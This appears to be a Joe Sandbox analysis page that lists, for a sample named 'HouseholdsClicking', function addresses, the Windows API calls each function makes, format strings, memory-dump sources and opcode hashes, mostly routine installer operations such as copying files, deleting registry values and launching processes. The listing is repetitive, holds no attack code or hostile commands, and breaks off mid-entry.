Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
String ID:
API String ID: 3376005127-0
Opcode ID: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
Instruction ID: 214764af72b390ffa64cdeb44d1c6cd0e8ca06a9e3a7070d0c65f9f565939ffa
Opcode Fuzzy Hash: 606da6def6221d12ef1392d662ca92edf1c337adf5941d48ecd243ca57024968
Instruction Fuzzy Hash: 0D112572A0010AAFDF00EFA1D9459AEBBB8EF08344B10447AF606F61A1D7798A40CB18

Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54memoryfilestringCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
WideCharToMultiByte.KERNEL32(?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
lstrlenA.KERNEL32(?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,004100F0,000000FF,?,00002004,?,?,00000011), ref: 00402B85

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
String ID:
API String ID: 2568930968-0
Opcode ID: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
Instruction ID: eb70b36e00a6049791e454e439637436730f967712bedb277b0d85a94317bb29
Opcode Fuzzy Hash: 8e94f5e6955cf742f0be7e70fe548515adb6d38661ae1e1cc5866dac39eea37a
Instruction Fuzzy Hash: 7F016171600205FFEB14AF60DD4CE9E3B78EB05359F10443AF606B91E2D6799D81DB68

Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 004020A3
GetClientRect.USER32(00000000,?), ref: 004020B0
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
DeleteObject.GDI32(00000000), ref: 004020EE

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28

Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE

Strings

!, xrefs: 00401FB6

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758

Function 004043D9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
wsprintfW.USER32 ref: 00404483
SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496

Strings

%u.%u%s%s, xrefs: 00404470

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259

Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B

RegCloseKey.ADVAPI32(00000000), ref: 0040282E
RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
DeleteRegKey: "%s\%s", xrefs: 00402843

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: CloseDeleteOpenValuelstrlenwvsprintf
String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
API String ID: 1697273262-1764544995
Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD

Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318

lstrlenW.KERNEL32 ref: 004026B4
lstrlenW.KERNEL32(00000000), ref: 004026C1
SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC

Strings

CopyFiles "%s"->"%s", xrefs: 0040267F

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
String ID: CopyFiles "%s"->"%s"
API String ID: 2577523808-3778932970
Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759

Function 00406250 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 53stringCOMMON

Download Yara Rule

APIs

wsprintfW.USER32 ref: 004062A4
lstrcatW.KERNEL32(00000000,...), ref: 004062C7

Strings

%02x%c, xrefs: 0040629C
..., xrefs: 004062BF

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: lstrcatwsprintf
String ID: %02x%c$...
API String ID: 3065427908-1057055748
Opcode ID: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
Instruction ID: 9bf571533c0fd83e5fe1ff618cfd19ea7d9613251e6e948213dceada22d50e27
Opcode Fuzzy Hash: e028bc25539a6ddd5d675d42839d030ce8218c39fe920002d96002040e934ce0
Instruction Fuzzy Hash: E201D272510219BFCB01DF98CC44A9EBBB9EF84714F20817AF806F3280D2799EA48794

Function 00405073 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 00405083

Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

OleUninitialize.OLE32(00000404,00000000), ref: 004050D1

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

Skipping section: "%s", xrefs: 004050E1
Section: "%s", xrefs: 004050A5

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: InitializeMessageSendUninitializelstrlenwvsprintf
String ID: Section: "%s"$Skipping section: "%s"
API String ID: 2266616436-4211696005
Opcode ID: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
Instruction ID: 3a4ae3dd184d198318ece42e1af7a5bc75ccdc2bd7a030bb5b2a43e0dda7b67b
Opcode Fuzzy Hash: 08831c163c79f6045eee3939d78ed76b32885a7039adc7eb93c092c170fa4538
Instruction Fuzzy Hash: 0EF0F433504300ABE7106766AC02B1A7BA0EF84724F25017FFA09721E2DB7928418EAD

Function 004020F9 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00402100
GetDeviceCaps.GDI32(00000000), ref: 00402107
MulDiv.KERNEL32(00000000,00000000), ref: 00402117

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426979,74DF23A0,00000000), ref: 00406902

CreateFontIndirectW.GDI32(00420110), ref: 0040216A

Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectVersionwsprintf
String ID:
API String ID: 1599320355-0
Opcode ID: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
Instruction ID: 0ba792ce9c48b24537a9dfec97a4105c0a721b5be590283e64661935fd66df2d
Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D

Function 00407224 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 43stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22

lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
lstrcmpW.KERNEL32(?,Version ), ref: 00407276
lstrcpynW.KERNEL32(?,?,?), ref: 0040728D

Strings

Version , xrefs: 0040726D

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: lstrcpyn$CreateFilelstrcmp
String ID: Version
API String ID: 512980652-315105994
Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1

Function 004032D2 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
GetTickCount.KERNEL32 ref: 00403303
CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC

Function 00406391 Relevance: 6.0, APIs: 4, Instructions: 31memorylibraryloaderCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
GlobalFree.KERNEL32(00000000), ref: 004063CA

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: Global$AddressAllocByteCharFreeMultiProcWide
String ID:
API String ID: 2883127279-0
Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674

Function 004048F8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040492E
CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C

Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

Strings

, xrefs: 00404906

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9

Function 00402797 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25stringCOMMON

Download Yara Rule

APIs

GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8

Strings

!N~, xrefs: 00402797

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: PrivateProfileStringlstrcmp
String ID: !N~
API String ID: 623250636-529124213
Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714

Function 00405C6B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
CloseHandle.KERNEL32(?), ref: 00405C9D

Strings

Error launching installer, xrefs: 00405C74

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
